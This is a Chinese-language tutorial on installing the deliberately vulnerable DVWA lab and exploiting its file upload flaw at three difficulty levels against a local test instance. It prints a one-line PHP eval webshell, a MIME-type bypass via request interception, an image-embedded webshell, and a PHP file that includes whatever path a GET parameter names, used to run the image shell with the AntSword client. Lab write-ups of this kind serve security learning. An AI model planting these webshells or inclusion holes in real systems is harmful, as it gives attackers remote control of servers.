DVWA的搭建以及文件上传漏洞各个等级测试

DVWA的安装环境

phpstudy 集成了PHP、MySQL、php-mysql等应用或组件。用起来十分方便。（这里就不详细介绍phpstudy的安装教程了）

下载DVWA

DVWA下载地址

将其安装包放在phpstudy的www目录下，找到config.inc.php.dist

并粘贴里边的内容，创建一个新的php文件config.inc.php
我是已经创建好的。
用记事本打开config.inc.php 文件修改以下内容：$_DVWA[ ‘db_password’ ] = ‘p@ssw0rd’; 将引号里面的p@ssw0rd改成 root

保存后打开电脑浏览器 地址栏输入127.0.0.1/DVWA-master/ 按下回车，然后点击网页底下的 Create/Reset Database 按钮会跳转到登录页面
默认账号：admin
密码：password
输入后按回车进入
总体安装起来是非常简单的

DVWA——File Upload

File Upload，即文件上传漏洞， 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷，而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马，病毒，恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的，“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。

自我感受
当我在bilibili上面看大师傅们的演示真的令我十分震撼，哈哈哈哈也可能是因为我太菜了吧！
获取服务器的WebShell权限来查看/上传/下载对方文件，查看数据库信息，执行命令，甚至恶搞等等，可以说是能够执行任意操作，实在是厉害，自愧不如。

风险点

·注册/修改个人信息处（上传头像）
·敏感身份认证处（身份证照片/银行卡照片/个人照片……）【多为·金融/借贷应用】
·订单评价反馈处（上传商品照片）【淘宝/京东……】
·朋友圈/空间
·所有能上传操作的地方

文件上传漏洞的利用是有限制条件：
一、能够成功上传木马文件
二、上传文件必须能够被执行
三、上传文件的路径必须可知

Low级别测试

源码：
DVWA_WEB_PAGE_TO_ROOT
为网页的根目录
target_path
变量为上传文件的绝对路径
basename( $_FILES['uploaded']['name'])
将文件中已经uploaded的文件的名字取出并加入到target_path变量中。
if语句判断文件是否上传到指定的路径中，若没有则显示没有上传。
服务器对上传文件的类型、内容没有做任何的检查、过滤，存在明显的文件上传漏洞，生成上传路径后，服务器会检查是否上传成功并返回相应提示信息。
此级别没有对上传文件的类型进行任何的过滤，也就是可以随意上传php文件。
构造一句话木马

<?php @eval($_POST['A']);?>

这个便是我们上传文件的部分路径
打开蚁剑，添加数据:

连接成功，打开便可以看到以下界面。

medium级别测试

源码：
可以对比出来中级的多了限制条件，只能传JPEG或者png图片并且还有大小限制。

那么我们就通过抓包，将type类型改为image/jpeg。
上传文件抓包：

然后点击forward，回到靶场，发现上传成功：

打开蚁剑，添加数据，连接，成功

High级别测试

源码：

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?> 

函数解析

strrpos(string,find,start)
strrpos()函数查找.出现在 $ uploaded_name的位置然后加1，再利用substr()函数从变量$uploaded_name的指定位置截取部分字符串。所以这段代码的作用就是为了截取上传文件的后缀名.

strtolower()
将无论是大写或小写的后缀名全改为小写，以防大小写绕过

getimagesize(string filename)
函数会通过读取文件头，返回图片的长、宽等信息，如果没有相关的图片文件头，函数会报错。
可以看到，High级别的代码读取文件名中最后一个“.”后的字符串，期望通过文件名来限制文件类型，因此要求上传文件名形式必须是”.jpg”、”.jpeg” 、”*.png”之一。同时，getimagesize函数更是限制了上传文件的文件头必须为图像类型。

制作一句话图片木马

上传图片：

绕过成功，但我通过蚁剑却连接不上，经过查找资料最后发现需要进行php代码解析，就是将自己的上传的文件（无论是什么类型的文件）以php代码执行；
下面我来补充一下使用蚁剑进行high等级shell连接：

还是需要制作一句话图片木马，上文已经讲过了，这里我就不再多说

3.jpg就是我所使用1.jpg和2.php制作的一句话木马；
然后需要编写一个include()php代码关于include的用法

<?php
$a=$_GET['id'];
include($a)
?>

命名为a.php,接下来就通过文件包含(a.php来包含我们所制作的的一句话木马图片，也就是3.jpg)来使用蚁剑连接：

http://127.0.0.1/DVWA-master/hackable/uploads/a.php?id=3.jpg

连接成功！！！！！！